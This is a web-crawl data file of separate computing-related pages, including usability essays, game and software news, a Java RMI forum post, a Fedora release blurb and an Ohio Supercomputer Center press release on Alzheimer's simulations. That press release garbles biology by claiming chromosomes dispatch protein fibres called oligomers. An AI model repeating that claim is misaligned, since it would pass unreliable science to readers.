The second argument against consistency has more to do with product perception than actual interactive design. While interfaces don't exactly go bad over time like milk or produce, a strict adherence to consistency does send a message to users that a product is becoming stale. Interfaces don't actually decay, but design evolves over time such that it is relatively easy to look at an application and give it a rough carbon dating. In a market where users are constantly seeking the newest product, fashion is a consideration.

Politics: User Control and Freedom
There aren't a lot of designers out there who are opposed to giving users control.
But the debates around the benefits of user control are some of the most fascinating, and also the most political, because essentially the debate is this: to what extent should people be free? Should we take a digital-libertarian stance and put users fully in charge of managing their digital lives? Is the freedom they are granted worth the responsibility and consequences? Or should we take a more digital-authoritarian stance and build a perfect walled garden with gated access, where users are guarded and protected? Do users actually want to be in control? If we ask them a question, will they make the correct choice?

Let's look at an example. Should users be able to control when a software application updates, and should they be able to undo that decision? Firefox's update dialog boxes can become very annoying over time, but they were nonetheless created with the best of intentions. Developers at Mozilla believed that it was a violation of user sovereignty to silently force an upgrade onto the user's machine. In contrast, developers on Chrome introduced a silent update system that takes control away from users. Avoiding disrupting users with administrative questions is widely regarded as providing a more pleasant experience even though it takes away user control.

What about the control and freedom to extend the capabilities of a software application? Firefox is renowned for its ability to be extended and customized. But over time some users install so many extensions, and some of them are so poorly written, that the performance of the browser itself suffers considerably. A similar problem has to do with battery life on Android devices. Some applications make heavy use of GPS, others access the network too often for updates, and others (e.g., Flash) put enough load on the CPU to make the device physically warm. When it comes to control, Android is rather digital-libertarian. If you dig into the preferences, you can view the actual distribution of battery usage, and then take on the personal responsibility to choose which applications you would like to use based on this data.

A designer on the digital-libertarian side of the debate believes that users need to have the personal responsibility to make the correct decisions for themselves. You don't want to update the application? You don't have to. The application is running too slow? It's your own fault for installing 15 extensions. Your battery only lasted an hour? Don't run Flash next time. Would you like to hideously customize your MySpace profile page? Sure! Why not add a soundtrack as well! The highest priority is freedom; how good your experience is with the product is left entirely up to you.

A designer on the digital-authoritarian side of the debate believes that applications should make the best decisions on the user's behalf. You don't want to update the application? It's a security update and you don't have a choice. Worried about your application running too slow? Don't worry, we've detected your attempted modification and disabled it for you. Want a longer battery life? We've banned Flash from our platform. Would you like to customize your Facebook profile page? Yeah, not so much… remember MySpace? The highest priority is making a product that is insanely great, and you can't be trusted.

This leads us to perhaps the broadest question of user control: should users be able to install any application they choose on their computer?
Windows has traditionally been a very open operating system, giving users a great deal of control and freedom. Users can install anything they want, including malware, provided they get past the "are you really, really, sure?" dialog boxes with big shiny shields on them. This level of control and freedom is both what is great and what is horrible about the experience of using Windows. In the lead-up to Microsoft's anti-trust trial, Bill Gates made the point that no one has ever asked Microsoft for permission to write a Windows application. At the time, few considered how important that was, or thought very deeply about the statement.

In contrast, look at iOS, where you can only install applications that have been approved by Apple. iPads and iPhones don't degrade, they don't get malware, and they don't ask you if you happen to trust the people who created the software you are about to install. In the rare event that a malicious piece of code gets into the walled garden, they can target and eliminate it from orbit. And then the garden is perfect again. Most designers would argue that the iPad provides a fantastic user experience, but it does so in part because it doesn't trust you enough to let you mess it up.

Conclusion
There are a number of ongoing debates in the field of interactive design. From the sections above, you might conclude that you should:

Value complexity over simplicity, it's more functional
Value recall over recognition, it's more efficient
Value change over consistency, it's more innovative
Take away user control and freedom, and do it quickly, ideally before your users completely wreck the experience

And this is all true… sometimes, depending on a lot of factors. Novice designers memorize the list of usability heuristics and try to employ them in their work. As a more experienced designer, you may have already seen a deeper dynamic at play here. Instead of using heuristics as a simple checklist, try placing pairs of the heuristics against one another in a spider graph. Achieving every ideal isn't possible because the pairs exist in direct opposition. Realizing this, the challenge shifts to shaping a design that captures as much surface area as it can, given all the opposing forces.

About the author: Alex Faaborg is, generally speaking, a pro-simplicity, pro-efficiency, anti-consistency designer who happens to be a secret digital-authoritarian sympathizer. He works on the design of Firefox at Mozilla, one of the most digital-libertarian organizations in existence.
Alex Faaborg
Alex Faaborg is a principal designer at Mozilla, where he focuses on the visual and interactive design of Firefox. He also contributes to Mozilla Labs, which explores the next stage in the evolution of the Web and its long term future. He has extensive experience in artificial intelligence, user interface design, and cognitive science and is a graduate of the MIT Media Laboratory.
HeuristicsPatents and Closed SystemsProduct designSimplicityUsability
It's important to note that everything this article says about the Apple walled garden also applies to the Android Market. Google can and does remove malicious apps from the Market. I've never been bitten by malware on my Android phone.
The malicious app argument is a red herring. Walled gardens are not necessary to exert the kind of control that Apple uses to improve user experience. They serve exactly one purpose: earning money for the garden's curator.
Here, Google has the right balance between digital libertarianism and authoritarianism: do the right thing for the user by default, but allow users with different opinions about what is right to do something else.
"Usability heuristics are...irrefutably true?" If designers really think that, a bit of debunking (as in this article) is in order. Context and audience are always part of the usability equation (even in the ISO standards, it includes specifying the audience, context, and task. A heuristic is a rule of thumb, not a metric or standard. Even guidelines like "efficiency" are always based on not only the context but audience expectations. That's why "usability requirements" are so hard to write (assuming you want requirements with hard metrics).
A heuristic review is done by experts because there is always judgement involved. The question isn't "is this efficient?" (for example) but "Is this appropriately efficient in terms of both time and effort for how real people will use this product?"
Great stuff. I think it's easy to forget that usability heuristics are relative to the target audience/users. | 计算机 |
2015-48/3681/en_head.json.gz/971 | Duke Nukem Developer Calls It Quits
Michael Barkoviak - May 7, 2009 1:49 PM
If you've been waiting for Duke Nukem Forever, and still had faith in the project, this news will sadden you
After numerous delays and years of hype in the gaming community, it looks like 3D Realms will never release Duke Nukem Forever, as the game studio has run out of money and will close its doors.
"We can confirm that our relationship with 3D Realms for Duke Nukem Forever was a publishing arrangement, which did not include ongoing funds for development of the title," explained publisher Take-Two.
Duke Nukem Forever has been in development for more than 12 years and was a follow-up to the popular 3D video game released by 3D Realms in 1996. The studio's games were popular more than a decade ago, but simply couldn't match game studio development in the 21st century, according to video game industry analysts.
The studio also worked on Commander Keen and Major Stryker, which were popular but never reached the same level as Duke Nukem and Wolfenstein 3D.
Take-Two and other studios involved in the project noted that the game may not be fully dead, but after such a long delay in development, it's highly unlikely the game will ever hit store shelves.
"Development of the Duke Nukem Trilogy is continuing as planned and further announcements about upcoming games will be made in the near future," according to a statement issued by Apogee Software.
News of the studio's closure is especially ironic as 3D Realms recently celebrated the 17th anniversary of its release of Wolfenstein 3D, which first hit the market in 1992.
RE: argh
Hudly
DNCORNHOLIO
In honor of this tragic event, I am going to install my original Duke3D (1.3d) and run it with JDuke3D and then beat it, then play my Duke It Out in D.C. expansion, and THEN play my Life's a Beach expansion. I miss this game. It is still amazing. And I'm very sad to hear that Duke4Ever will probably never see the light of day. *whistles Indiana Jones theme*
acase
DNSTUFF
cheetah2k
DNF
1992-2009
A kind and loving man
Loved guns & blowing $hit up
Survived by his undying fans
...may he R.I.P...
2015-48/3681/en_head.json.gz/978 | Report: Retail Office 2013 Software Can Only Be Installed on a Single PC for Life
Microsoft makes Office 2013 licensing much more restrictive
Microsoft has certainly made its share of strange moves over the years when it comes to software licensing. However, the company has again raised the ire of its customers with a change in retail licensing agreement for Office 2013. Microsoft confirmed this week that Office 2013 will be permanently tied to the first computer on which it is installed.
Not only does that mean you will be unable to uninstall the software on your computer and reinstall it on a new computer, it also means that if your computer crashes and is unrecoverable, you'll be buying a new license for Office 2013.
This move is a change from past licensing agreements with older versions of Office, and many believe that this move is a way for Microsoft to push consumers to its subscription Office plans.
"That's a substantial shift in Microsoft licensing," said Daryl Ullman, co-founder and managing director of the Emerset Consulting Group, which specializes in helping companies negotiate software licensing deals. "Let's be frank. This is not in the consumer's best interest. They're paying more than before, because they're not getting the same benefits as before."
Prior to Office 2013, Microsoft's end-user license agreement for retail copies of Office allowed the owner to reassign the license to a different device any number of times as long as that reassignment didn't happen more than once every 90 days. The Office 2013 EULA changes that verbiage, stating, "Our software license is permanently assigned to the licensed computer."
When Computer World asked Microsoft if customers can move Word and its license to replacement PC if the original PC was lost, stolen, or destroyed Microsoft only replied "no comment."
Source: Computer World
RE: Great
CaedenV
OneNote is perhaps the best single piece of software that MS has ever come out with... but in true MS form they have no idea how to market it. It is an organizational tool that allows you to take snippits of video, web pages, office documents of all kinds, text, and hand written notes and put them in a sort of digital notebook. At home I use it to help with project planning for home upgrades (solar panels, PEX water piping, etc.), while at work I use it the way I use to use Access to track my interactions with business partners. It is like having all of the useful stuff of access in a more visually appealing package, but without learning how to program macros (granted, Access is WAY more powerful, but it is overkill for what I do)Also, if you have win8 OneNote Metro is free anyways, so it is just one less reason to get office anyways (granted the free version is not quite as useful as the desktop version, but still quite handy). Parent
2015-48/3681/en_head.json.gz/1265 | CORBA , RMI and now JSHOOTER !
Thread: CORBA , RMI and now JSHOOTER !
mcgrow
Distributed Applications
CORBA products provide a framework for the development and execution of distributed applications. But why would one want to develop a distributed application in the first place? As you will see later, distribution introduces a whole new set of difficult issues. However, sometimes there is no choice; some applications by their very nature are distributed across multiple computers because of one or more of the following reasons:
The data used by the application are distributed
The computation is distributed
The users of the application are distributed
Data are Distributed
Some applications must execute on multiple computers because the data that the application must access exist on multiple computers for administrative and ownership reasons. The owner may permit the data to be accessed remotely but not stored locally. Or perhaps the data cannot be co-located and must exist on multiple heterogeneous systems for historical reasons.
Computation is Distributed
Some applications execute on multiple computers in order to take advantage of multiple processors computing in parallel to solve some problem. Other applications may execute on multiple computers in order to take advantage of some unique feature of a particular system. Distributed applications can take advantage of the scalability and heterogeneity of the distributed system.
Users are Distributed
Some applications execute on multiple computers because users of the application communicate and interact with each other via the application. Each user executes a piece of the distributed application on his or her computer, and shared objects, typically execute on one or more servers. A typical architecture for this kind of application is illustrated below.
Prior to designing a distributed application, it is essential to understand some of the fundamental realities of the distributed system on which it will execute.
The Java Remote Method Invocation Application Programming Interface (API), or Java RMI, is a Java application programming interface that performs the object-oriented equivalent of remote procedure calls (RPC).
1. The original implementation depends on Java Virtual Machine (JVM) class representation mechanisms and it thus only supports making calls from one JVM to another. The protocol underlying this Java-only implementation is known as Java Remote Method Protocol (JRMP).
2. In order to support code running in a non-JVM context, a CORBA version was later developed.
Usage of the term RMI may denote solely the programming interface or may signify both the API and JRMP, whereas the term RMI-IIOP (read: RMI over IIOP) denotes the RMI interface delegating most of the functionality to the supporting CORBA implementation.
The programmers of the original RMI API generalized the code somewhat to support different implementations, such as a HTTP transport. Additionally, the ability to pass arguments "by value" was added to CORBA in order to support the RMI interface. Still, the RMI-IIOP and JRMP implementations do not have fully identical interfaces.
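To make the JRMP-style usage above concrete, here is a minimal, hypothetical sketch of a Java RMI service; the Greeting interface, the registry port and the binding name are illustrative assumptions, not part of JShooter or any other product discussed in this thread:

```java
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

// The remote contract: every remotely callable method must declare RemoteException.
interface Greeting extends Remote {
    String greet(String name) throws RemoteException;
}

// Server-side implementation plus bootstrap code.
public class GreetingServer implements Greeting {
    public String greet(String name) throws RemoteException {
        return "Hello, " + name;
    }

    public static void main(String[] args) throws Exception {
        Greeting stub = (Greeting) UnicastRemoteObject.exportObject(new GreetingServer(), 0);
        Registry registry = LocateRegistry.createRegistry(1099); // default RMI registry port
        registry.rebind("Greeting", stub);                       // publish under a well-known name
        System.out.println("Greeting service bound");
    }
}

// A client in another JVM would do roughly:
//   Registry registry = LocateRegistry.getRegistry("server-host", 1099);
//   Greeting g = (Greeting) registry.lookup("Greeting");
//   System.out.println(g.greet("world"));
```

The same interface could also be exposed over IIOP via RMI-IIOP when CORBA interoperability is required, which is essentially the delegation described above.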
AND NOW JSHOOTER
JShooter (Reflect in Network Framework)
What is JShooter?
JShooter is a framework for distributing application programs on the network. Certainly, you have used RMI, Corba and JMS. Each of aforementioned technologies has its own special problems and at the same time enjoys extraordinary advantages. However, you must be careful about the expenses caused by these technologies. In most cases RMI, Corba and JMS increase the productions' costs unbelievably. However in other cases they confuse programmers. Years ago, Reflect Oriented Programming was the focus of attention within professional programmers, then Aspect Oriented Programming came into the programming world but instead of reducing the programmer's task, it causes the professional programmers and even the amateur ones to be confused in many cases. One of the most important capabilities of JShooter is that it makes the "Reflect Oriented Programming" easier to use.
For more information about JSHOOTER go to
Browse Shine-Enterprise-Java-Pattern Files on SourceForge.net
download its doc and the Shine enterprise library
corba, j2ee, java, rmi | 计算机 |
2015-48/3681/en_head.json.gz/1718 | The ultimate guide to testing your website
By Cennydd Bowles
How to conduct 'guerrilla testing' to perfect usability
After so many shoddy sites, pop-up windows and forced registrations, the truth is that if people don't find your website easy to use, they won't come back. Worse, they'll tell their friends just how clueless you are. The answer is, of course, to design everything around the needs of your users. We've known this for years, but there's still resistance to even the most basic usability testing.
Excuses, excuses
"The site makes sense to me," designers will say. "I don't need to test it with other people." Ah, but you're very different to your users, which means it's dangerous to assume they'll use a website in the same way as you – particularly if you've just spent months building it and learning all its quirks.
Another excuse people use for not testing is: "We can just use focus groups/market research." But we're talking about two very different things here. Market research is really about "How can I attract customers?". It focuses on people's reactions to a particular marketing or brand approach. Usability testing asks: "How can I make it easy for customers once they're here?" This touches upon people's emotional responses, but it's more about seeing whether people can use something than whether they like it.

"But surely, usability is just common sense," you might go on to argue. This attitude is understandable to an extent – well-designed systems often do look very simple and it's tempting to conclude that making things easy is, well, easy. Unfortunately, the hard part is everything leading up to the simple solution. Try just one usability test and you'll be amazed at how a site that seemed sensible to you can cause problems for others.

One final line of argument we often encounter against testing is: "It's just too expensive!" Thankfully, nowadays, this is only the case for large, formal usability testing. Sometimes multiple rounds of testing and teams of experts are entirely appropriate, but more and more people are turning to 'guerrilla' usability testing for a quick, cheap insight into how to make their websites better. Here's how to do it.

Planning your tests
First you need to consider at what stage of development you want your site tested. Running a usability test on an existing site can give you an excellent overview of how well it works and how it can be improved. This is what's known as a summative test. However, usability testing is for life, not just for Christmas, so it's often worth testing sites as you're making them, too – studies show it's 100 times cheaper to fix problems during design than after launch. This is called formative testing because it helps you refine your ideas as you go. It's an increasingly common approach and fits in particularly well with the Agile philosophy.

If you're testing an unfinished site you need to choose what bits to test – usually stuff you've just developed, or perhaps a prototype. Lo-fi paper prototypes are great ways to test early drafts of your site. Either take wireframes, if you have any, or sketch and cut out the relevant sections. You can then rearrange them on a large A3 sheet and ask your participant to interact with it as if it were a real site: using a finger to represent clicks, speaking keyboard input out loud and so on. Although this approach requires a certain suspension of disbelief, participants are usually happy to adapt to this unusual form of test.

Paper prototypes are best suited to sites early in development. As you get closer to a solution, you'll want to test either what you've already coded or more substantial prototypes. For higher-fidelity prototypes, you can use specialist prototyping software such as Axure and iRise, or get stuck in with HTML.
2015-48/3681/en_head.json.gz/2108 | HomeAbout OSCOur MissionAt A GlanceGovernanceCareersLeadershipPartnersVisit the Ohio Supercomputer CenterSupercomputingGetting StartedHPC EnvironmentsChangelogAvailable SoftwarePortalsTutorials & TrainingSupport ServicesFAQCiting OSCSearch DocumentationCyberinfrastructureAnalytics ResearchNetworking ResearchNetworking SupportOARnetResearchBioinformaticsVirtual Environments & SimulationComputational Science Engineering ApplicationsSystems ResearchGet an AccountRenew your projectResearch ReportsSupercomputing PortalsEducationSummer Educational ProgramsYoung Women's Summer InstituteSummer InstituteSponsor Summer ProgramsRalph Regula School of Computational ScienceIndustryAweSimStarter Packages for IndustryFull Service OfferingsOur ClientsNewsUpcoming EventsMedia InquiriesMedia KitPress ReleasesBrandingBlogUpcoming EventsMedia InquiriesMedia KitPress ReleasesBrandingContact UsSupercomputing SupportGeneral InquiriesMedia InquiriesStaff Directory You are hereHome Researcher simulates Alzheimer's 'protein misfolding' errors Computational project to yield better understanding of devastating disorderComputational project to yield better understanding of devastating disorder
Jie Zheng, Ph.D.
Using computer simulations, Dr. Zheng is predicting and validating several molecular models of Aβ oligomers to better understand how they are formed and accumulate in Alzheimer's disease.
Columbus, Ohio (April 21, 2010) – A University of Akron researcher is creating sophisticated computer simulations at the Ohio Supercomputer Center to help understand how “misfolded” proteins in the brain contribute to degenerative disorders, such as Alzheimer’s disease.
Alzheimer’s disease is the most common human neurodegenerative disorder, affecting as many as 5.1 million people in America alone, according to the National Institutes of Health (NIH). Alzheimer’s most often appears after age 60 and leads to progressive and irreversible memory loss, disability and, eventually, death. Disorders like Alzheimer’s occur through a complex series of events that take place in the brain over a long period of time, probably beginning a decade or two before the most significant symptoms arise.
In the nucleus of nearly every human cell, long strands of DNA are packed tightly together to form chromosomes, which contain all the instructions a cell needs to function. To deliver these instructions to various other cellular structures, the chromosomes dispatch very small protein fibers – called oligomers – that fold into three-dimensional shapes. Misfolded proteins – called amyloid fibrils – cannot function properly and tend to accumulate into tangles and clumps of waxy plaque, robbing brain cells of their ability to operate and communicate with each other, according to NIH.
The strength of this research project lies in the integration of different experimental techniques with a computational approach to effectively illustrate various aspects of amyloid formation and its damaging effects, according to Jie Zheng, Ph.D., an assistant professor of chemical and biomolecular engineering at the University of Akron.
“The exact mechanism of amyloid formation and the origin of its toxicity are not fully understood, primarily due to a lack of sufficient atomic-level structural information from traditional experimental approaches, such as X-ray diffraction, cryoelectron microscopy and solid-state NMR data,” Zheng explained. “Molecular simulations, in contrast, allow one to study the three-dimensional structure and its kinetic pathway of amyloid oligomers at full atomic resolution.”
Zheng’s research group is developing a multiscale modeling and simulation platform that integrates structural prediction, computational biology and bioinformatics to establish a direct correlation between the formation of oligomers and their biological activity in cell membranes. This research is important for understanding the build-up of protein plaque, how it contributes to the breakdown of cells and how the process might be prevented.
"This project has broad impacts on the prevention of disease-related protein misfolding and aggregation," said Zheng. "The ultimate goal of this project is to rationally design a series of effective ligands/inhibitors to prevent amyloid formation."
Zheng’s anti-amyloid project is leveraging the computational muscle of the IBM Cluster 1350 system at the Ohio Supercomputer Center. The center’s flagship supercomputer system, named the Glenn Cluster, features 9,500 cores, 24 terabytes of memory and a peak computational capability of 75 teraflops – about 75 trillion calculations per second.
Zheng’s computational approach uses replica-exchange molecular dynamics simulations, a computationally intensive process for analyzing protein folding. The REMD method performs a large number of concurrent simulations of amyloid formation while introducing different variables, such as temperature, that can influence the outcome of the process.
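As general background on the technique (not a detail reported for this particular study): in temperature-based REMD, copies of the system run in parallel at different temperatures, and neighbouring replicas periodically attempt to swap configurations. A swap between replicas at inverse temperatures $\beta_i$ and $\beta_j$ holding configurations with potential energies $E_i$ and $E_j$ is typically accepted with the Metropolis-style probability

$$P_{\text{accept}} = \min\bigl\{1,\ \exp\bigl[(\beta_i - \beta_j)(E_i - E_j)\bigr]\bigr\},$$

so high-temperature replicas help low-temperature ones escape misfolded, aggregation-prone conformations that would otherwise trap a single simulation.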
“It’s great to hear that OSC resources are being utilized to investigate the cause of such devastating human diseases, especially one that robs us of the very essence of our humanity, our memories,” said Don Stredney, director of the Center’s Interface Lab and research scientist for Biomedical Applications. “We are pleased that OSC can accelerate the iterations required for such complex conformational studies, leading to new insights into the mechanisms of memory loss.”
Zheng’s amyloid protein research project recently won a five-year, $400,000 award through the Faculty Early Career Development program of the National Science Foundation (NSF). One of the NSF’s most prestigious recognitions, the CAREER Award is bestowed “in support of junior faculty who exemplify the role of teacher-scholars through outstanding research, excellent education and the integration of education and research within the context of the mission of their organizations.”
Zheng joined the department of Chemical and Biomolecular Engineering at the University of Akron in 2007 as an assistant professor, after working as a scientist at the National Cancer Institute since 2005. He received his doctorate in chemical engineering from the University of Washington in 2005.
The Ohio Supercomputer Center is a catalytic partner of Ohio universities and industries that provides a reliable high performance computing infrastructure for a diverse statewide/regional community. Funded by the Ohio Board of Regents, OSC promotes and stimulates computational research and education in order to act as a key enabler for the state's aspirations in advanced technology, information systems, and advanced industries. For additional information, visit http://www.osc.edu
2015-48/3681/en_head.json.gz/2152 | What Akers Media Group does...
Publishing
The magazines of Akers Publishing — Lake & Sumter Style, Healthy Living, and The Villages Style — set the Akers Media standard by focusing on the communities they serve. Each magazine provides up-to-date, entertaining, and thought-provoking content that thoroughly represents the people and places that make these communities special.
Creative
When you choose Akers Creative, you gain a team of dedicated Akers Media professionals. We dissect your business and all its various components, getting down to the core of what makes you tick. By looking at every angle, we can help you develop a plan that will ensure success.
Studio
The old adage holds that a picture is worth a thousand words. Akers Media's philosophy is that a thousand words is merely a good starting point. At Akers Studio, we produce priceless images that inspire words like “magnificent,” “breathtaking,” “stunning” or “perfect.” And we do so for every client, whether they need a quick passport photo or a 60-minute documentary.
Akers Media's Work
Here are just a few of our faves.
Yeah, they've called our name a time or two.
Akers Media Group has been recognized with over 75 awards for excellence in publishing and creative.
Akers is Amazing!
Akers Media is one of central Florida's most award-winning companies and is ranked #23 among Inc. Magazine's fastest-growing media companies nationwide.
It's True.
Akers Media has been recognized with over 75 awards for design, writing, advertising and publishing excellence. Additionally, Akers Media has been recognized locally as “Business of the Year” by the Leesburg Partnership; “Partner of the Year” by Lifestream Behavioral Center, The Lake County Education Foundation, and Florida Hospital Waterman Foundation; and “The Health Hero” by the Lake County Health Department.
Akers Media is a well-known, well-respected company due to its overwhelmingly popular publications, as well as its design and photography services. Akers Media websites have also gained a tremendous following since the launch of StyleTV and its online blog. These websites are now experiencing an average of over 300,000 hits each month. We believe that our popularity stems from our ability to engage readers and connect with the community. We are able to do this so effectively because we have an experienced and talented in-house team of designers, photographers, video producers, writers, editors, web developers and administrators.
Stop by and visit Akers Media.
We'll start you on a path to a new creative solution.
Akers Media, 108 5th Street, Leesburg FL 34748
Contact Akers Media!
2015-48/3681/en_head.json.gz/2467 | The Fedora Project is an openly-developed project designed by Red Hat, open for general participation, led by a meritocracy, following a set of project objectives. The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from open source software. Development will be done in a public forum. The project will produce time-based releases of Fedora about 2-3 times a year, with a public release schedule. The Red Hat engineering team will continue to participate in building Fedora and will invite and encourage more outside participation than in past releases. Fedora 15, a new version of one of the leading and most widely used Linux distributions on the market, has been released. Some of the many new features include support for Btrfs file system, Indic typing booster, redesigned SELinux troubleshooter, better power management, LibreOffice productivity suite, and, of course, the brand-new GNOME 3 desktop: "GNOME 3 is the next generation of GNOME with a brand new user interface. It provides a completely new and modern desktop that has been designed for today's users and technologies. Fedora 15 is the first major distribution to include GNOME 3 by default. GNOME 3 is being developed with extensive upstream participation from Red Hat developers and Fedora volunteers, and GNOME 3 is tightly integrated in Fedora 15." manufacturer website
1 DVD for installation on an x86_64 platform | 计算机 |
2015-48/3681/en_head.json.gz/5033 | phpJabberd
PSP emulator for PS3 – Play PSP games on your PS3
Written by Francis on Consoles, PS3, PSP
According to French site PS3Gen.fr, Sony is working on an emulator that will allow PSP games to be played on the PS3 system.
This is just a rumor for the time being, however, according to their source retail PlayStation Portable UMD titles, those available on the PlayStation Store and even new PSP Minis may see the light of day on the PlayStation 3 in the future.
To quote, roughly translated: “Playing PSP games on the PS3 seems to be a project that Sony is preparing in secret. Here's the surprising news that we have gleaned, which could make you love the dematerialization of games.
The “ONLY COMPATIBLE with the PSP”… may disappear.
This should be made possible through a PSP emulator on the PS3 and the dematerialization of games that are now sold on the PlayStation Store and on UMD in stores. This would also be interesting for all games in the Minis category.
The Minis could arrive on PS3 soon without additional programming from the devs. This information has been provided by a knowledgeable person, and we pass it along calmly as we have seen evidence that convinced us.
Unfortunately we are unable to upload the “evidence” but the future will show whether we were right. | 计算机 |
2015-48/3681/en_head.json.gz/5210 | Posted Ouya: ‘Over a thousand’ developers want to make Ouya games By
Check out our review of the Ouya Android-based gaming console.
Even after the relatively cheap, Android-based Ouya console proved a massive success on Kickstarter (the console was able to pull in nearly $8.6 million from investors despite having an initial goal of only $960,000), pundits and prospective owners of the new gaming machine loudly wondered how well it would be able to attract developers who would otherwise be making games for the Xbox 360, iPhone or PC. Assuming you believe official statements made by the people behind the Ouya console, there is nothing to worry about on that front.
“Over a thousand” developers have contacted the Ouya creators since the end of their Kickstarter campaign, according to a statement published as part of a recent announcement on who will be filling out the company’s leadership roles now that it is properly established. Likewise, the statement claims that “more than 50” companies “from all around the world” have approached the people behind Ouya to distribute the console once it is ready for its consumer debut at some as-yet-undetermined point in 2013.
While this is undoubtedly good news for anyone who’s been crossing their fingers, hoping that the Ouya can make inroads into the normally insular world of console gaming, it should be noted that while these thousand-plus developers may have attempted to reach the Ouya’s creators, the company offers no solid figures on how many of them are officially committed to bringing games to the platform. That “over a thousand” figure means little if every last developer examined the terms of developing for the Ouya and quickly declined the opportunity in favor of more lucrative options. We have no official information on how these developer conversations actually went, so until we hear a more official assessment of how many gaming firms are solidly pledging support to the Ouya platform, we’ll continue to harbor a bit of cynicism over how successful this machine might possibly be.
As for the aforementioned personnel acquisitions, though they’re less impressive than the possibility that thousands of firms are already tentatively working on games for the Ouya, they should offer a bit more hope that the company making the console will remain stable, guided by people intimately familiar with the gaming biz. According to the announcement, Ouya has attracted former IGN president (and the first investor in the Ouya project) Roy Bahat to serve as chairman of the Ouya board. Additionally, the company has enlisted former EA development director and senior development director for Trion Worlds’ MMO Rift, Steve Chamberlin, to serve as the company’s head of engineering. Finally, Raffi Bagdasarian, former vice president of product development and operations at Sony Pictures Television has been tapped to lead Ouya’s platform service and software product development division. Though you may be unfamiliar with these three men, trust that they’ve all proven their chops as leaders in their respective gaming-centric fields.
Expect to hear more solid information on the Ouya and its games line up as we inch closer to its nebulous 2013 release. Hopefully for the system’s numerous potential buyers, that quip about the massive developer interest the console has attracted proves more tangible than not. | 计算机 |
2015-48/3681/en_head.json.gz/5318 | Singularity Interview
Written by Charles Husemann on 6/10/2010
Singularity was introduced at E3 last year and wowed quite a few people with its time-bending plot and top-notch visuals. With the game scheduled to hit stores in a few weeks, we were able to land an exclusive interview with Raven Software to dive a bit deeper into the game. Here it is.
Can you introduce yourself, talk about your role on the project and how you got into the games industry? What kind of things do you do daily on the game?
I’m Brian Raffel, Co-founder and Studio Head of Raven Software. Singularity is a very important game for us, so I played many different roles from level design to artwork to story. I wanted to make sure it was the best it could possibly be. What's the backstory for Singularity and could you introduce us to the character we'll be playing? Is he based on any real life person or group of people? How does he differ from the standard FPS hero?
In Singularity, you take on the role of Nathaniel Renko, a U.S. Recon Marine. Because we want to immerse the player in our world, you rarely see Renko in the game and he doesn’t speak at all - this helps the player feel more like they are the main character. How did you come up with the concept of the game? Did you start with the time manipulation elements and work a story around it or the other way around?
The game started around the core concept of using time to change the state of objects/creatures/people on an individual basis. We knew that would open the player up to seeing the world in a whole new light and give them abilities they’ve never had before. The story and the time manipulation elements were developed at the same time – it was the best way to make them feel like a natural fit with each other. Was it hard to get the greenlight on a new IP with Activision? Is Singularity going to be a stand-alone game or are you looking at it as a beachhead for a new franchise?
New IPs are very costly and always a bit of a gamble, so yes, it wasn't easy to get it to the light of day. But Activision is always willing to try a new IP if it offers something new and exciting. We did develop a secret demo off the radar because we knew the core concept was something they had to see in action - a bulleted paragraph just wouldn't do it justice. It was very cool for me to show it to Activision and have them so impressed that they were ready to move on it right away.
Russians seem to have become a popular bad guy in games lately (Modern Warfare 2, Bad Company 2) and now in Singularity. Why do you think we're back to fighting Russians in games again?
We chose Russia for several reasons, the number one being my brother, Steve, and I grew up during the Cold War and we wanted to use that to drive the story. Secondly, the Russians have always impressed us with their ability to think on a massive scale; it would be believable for them to pull off this type of scientific accomplishment.
Raven has a long, solid background in developing FPS games, what are the key elements in a modern FPS game? What has been the most important change in the genre over the last ten years or so? Are we at a point where game developers are just refining the genre or do you think there's still a big leap in the genre coming up?
Visual fidelity continues to improve but most companies are now on a level playing field in regards to that because everyone has the same console to work with and many developers use the Unreal engine. 10 years ago you could stand out simply by having the latest visual bells and whistles.
The biggest changes are that gameplay hooks and story have become incredibly important. What can your game do that no other game can? Do you have a compelling story that engages the player? Are the characters believable? Are they well acted? Right now, the game industry is in a refinement period. As new platforms become available such as Natal or iPad, we’ll discover things about interaction that will provide the next big leap. Some of those lessons will be carried back to a “standard FPS”. Look at the first round of iPad games; FPS games don’t translate well because there's a big tablet to hold and the controls didn’t make the leap from iPhone up. Eventually that will be solved and it will become the standard. To sum up, I think there are still big leaps on the horizon, probably in the interaction side of things.
Gamers and press seem a bit preoccupied with how long the single-player portions of games are. Do you start with a target of how long you want the game to be, or do you just focus on telling a story and then add more if the game is short? Is length a valid criterion or not?
Raven's number one goal is creating a quality gaming experience that's exciting from beginning to end. We would rather the player finish wanting more than have them slog through 12+ hours of mediocre content. But we are sensitive to the fact that people feel they're being overcharged if they aren't getting 6 to 8 hours out of a game. This figure has changed a lot in the 20 years that we've been developing games; there was a time when gamers expected 20+ hours of game play. What kind of time manipulation abilities will you have with the TMD? Were there other abilities you thought of but had to eliminate for technical or time reasons? What kind of design challenges do the time manipulation features pose?
The biggest design challenge was how we would introduce the TMD and it’s abilities to the player. We had a TON of ideas on what to do with the Time Manipulation Device – way more than we could put in. One of the basic abilities I can reveal is being able to shift an object forward or backwards in time, and using its different states to aid in gameplay. For example, you could age a barrel to dust, stand on it, and then age it back to full height and use it as a pedestal to jump up to a new area. This is just a small example of what we’re allowing the player to do with the TMD. Outside of the TMD what kind of weapons will players have at their disposal? Could you discuss the selection criteria for the game's arsenal? There are a variety of weapons for the player to use such as a machine gun, shotgun, and sniper rifle as well as some non-standard ones. We wanted to make sure our non-standard weapons provided a new type of experience or a different way to fight. We didn’t want to duplicate functionality from weapon to weapon and I think we succeeded in that.
Any chance you'll be supporting motion controls via Natal and/or Move? What are your thoughts on motion controls for first-person shooters? Is there something useful there or not?
We aren't currently planning to support motion controls for Singularity. Motion controls like the Natal are very intriguing and could open up exciting new avenues in the first person shooter style of game. However, a game should be designed from the outset to take advantage of motion control and not shoe-horned in to be a marketing bullet point on the box. Since these controls debuted well after we were into development on Singularity, we chose not to pursue it.
What's been the biggest change in the game since you started development? Were there things that turned out better than expected?
The biggest changes during the development of Singularity were the way the TMD is used and how the player interacts with the objects/creatures/people the TMD can affect. We'd like to thank Brian for taking the time to answer our questions as well as Wiebke for coordinating the interview and dealing with my constant nagging.
About Author
